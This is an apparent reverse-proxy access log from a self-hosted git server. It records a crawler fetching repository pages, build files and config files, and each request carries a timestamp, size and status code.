git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11283] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11286] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11285] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11284] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11774] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" -[17/Feb/2026:16:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11773] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" -[17/Feb/2026:16:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json?display=source" [Client 74.7.227.38] [Length 11784] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:16:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fxref-GoldMonitor.html" [Client 74.7.227.38] [Length 20982] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:16:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fxref-AssetPilot.html" [Client 74.7.227.38] [Length 20986] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:16:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11018] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" -[17/Feb/2026:16:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11017] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" -[17/Feb/2026:16:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore?display=source" [Client 74.7.227.38] [Length 12043] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" -[17/Feb/2026:16:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" -[17/Feb/2026:16:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:16:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore?display=source" [Client 74.7.227.38] [Length 11003] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" -[17/Feb/2026:16:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore?display=source" [Client 74.7.227.38] [Length 10967] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" -[17/Feb/2026:16:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" -[17/Feb/2026:16:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore?display=source" [Client 74.7.227.38] [Length 12045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" -[17/Feb/2026:16:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2frules.ninja" [Client 74.7.227.38] [Length 26965] [Gzip 5.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:16:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8499] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostissues&state=closed" -[17/Feb/2026:16:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11687] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:16:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:16:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:16:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12039] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:16:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8484] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=name&state=closed" -[17/Feb/2026:16:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?page=2&tab=activity" [Client 74.7.227.38] [Length 8426] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:16:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:16:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11563] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html" [Client 74.7.227.38] [Length 32208] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html" [Client 74.7.227.38] [Length 57808] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:16:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?page=1&tab=activity" [Client 74.7.227.38] [Length 10045] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?page=2&tab=activity" -[17/Feb/2026:16:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11330] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12171] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 